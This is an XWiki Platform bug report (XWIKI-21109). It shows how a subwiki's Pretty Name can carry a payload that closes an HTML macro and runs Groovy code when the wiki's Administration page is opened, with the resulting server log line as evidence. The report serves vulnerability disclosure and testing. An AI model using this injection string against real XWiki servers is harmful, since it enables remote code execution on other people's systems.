Uploaded image for project: 'XWiki Platform'
  1. XWiki Platform
  2. XWIKI-21109

Wiki Pretty name content is executed in the Administration of a subwiki he created

    XMLWordPrintable

Details

    • Bug
    • Resolution: Duplicate
    • Blocker
    • None
    • 9.2-rc-1
    • Administration
    • Windows 11 Pro, Edge 114, using a local instance of XWiki 15.5, Jetty/HSQLDB
    • Unknown
    • N/A
    • N/A

    Description

      Steps to reproduce

      1. Login as an user (e.g. U1)
      2. Create a subwiki with Pretty Name: 
        ]]{{/html}}{{async}}{{groovy}}services.logging.getLogger("attacker").error("Attack succeeded!"){{/groovy}}{{/async}}
      3. Go to the subwiki
      4. Navigate to Drawer > Administer Wiki

      Expected results

      The code is not executed and no error is displayed in the server side logs.

      Actual results

      The content is executed and the following error is displayed in the logs:

      2023-07-05 14:59:35,483 [org.xwiki.rendering.async.internal.AsyncRendererJob@f0b7c79([async, macro, htmlasyncgroovyservicesloggin1:XWiki.AdminSheet, 24, author, xwiki:XWiki.superadmin, rendering.restricted, false, secureDocument, htmlasyncgroovyservicesloggin1:XWiki.AdminSheet, 165])] ERROR attacker                       - Attack succeeded!

      Attachments

        Issue Links

          duplicates

          Bug - A problem which impairs or prevents the functions of the product. XWIKI-21110 Remote code execution through the section parameter in Administration as guest

          • Blocker - Blocks development and/or testing work, production could not run.
          • Closed

          Activity

            People

              MichaelHamann Michael Hamann
              iandriuta Ilie Andriuta
              Votes:
              0 Vote for this issue
              Watchers:
              1 Start watching this issue

              Dates

                Created:
                Updated:
                Resolved: